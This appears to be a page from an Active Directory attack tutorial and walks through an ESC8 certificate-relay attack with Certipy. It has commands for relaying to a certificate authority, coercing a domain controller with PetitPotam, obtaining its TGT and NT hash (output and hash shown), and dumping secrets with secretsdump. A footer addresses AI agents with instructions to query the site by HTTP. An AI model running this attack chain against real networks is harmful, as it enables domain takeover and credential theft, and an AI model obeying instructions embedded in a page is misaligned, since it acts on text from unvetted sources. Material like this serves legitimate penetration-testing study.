# ESC8 - with certipy ADCS attack tool [certipy](https://github.com/ly4k/Certipy) to automatise a lots of things. Let’s do the same attack with certipy, setup the listener : ### Install Certipy ``` sudo pip3 install certipy-ad ``` ``` sudo certipy relay -ca 192.168.56.23 -template DomainController ``` * execute the coerce just like we did before with petitpotam ``` python3 PetitPotam.py 192.168.56.31 baltimore.maryland.local ``` * Now we got the certificate so we can get the NT hash of the DC and also the TGT with the command : ``` sudo certipy auth -pfx baltimore.pfx -dc-ip 192.168.56.12 Certipy v4.3.0 - by Oliver Lyak (ly4k) [*] Using principal: baltimore$@maryland.local [*] Trying to get TGT... [*] Got TGT [*] Saved credential cache to 'baltimore.ccache' [*] Trying to retrieve NT hash for 'baltimore$' [*] Got hash for 'baltimore$@maryland.local': aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759 ``` ``` export KRB5CCNAME=/home/jefe/ADCS/baltimore.ccache secretsdump.py -k -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local # or with the hash secretsdump.py -hashes ':aad3b435b51404eeaad3b435b51404ee:d06fbfbf20638881486242cfa9827759' -no-pass MARYLAND.LOCAL/'baltimore$'@baltimore.maryland.local ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://watchdogsacademy.gitbook.io/attacking-active-directory/active-directory-certificate-services-adcs/esc8-with-certipy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.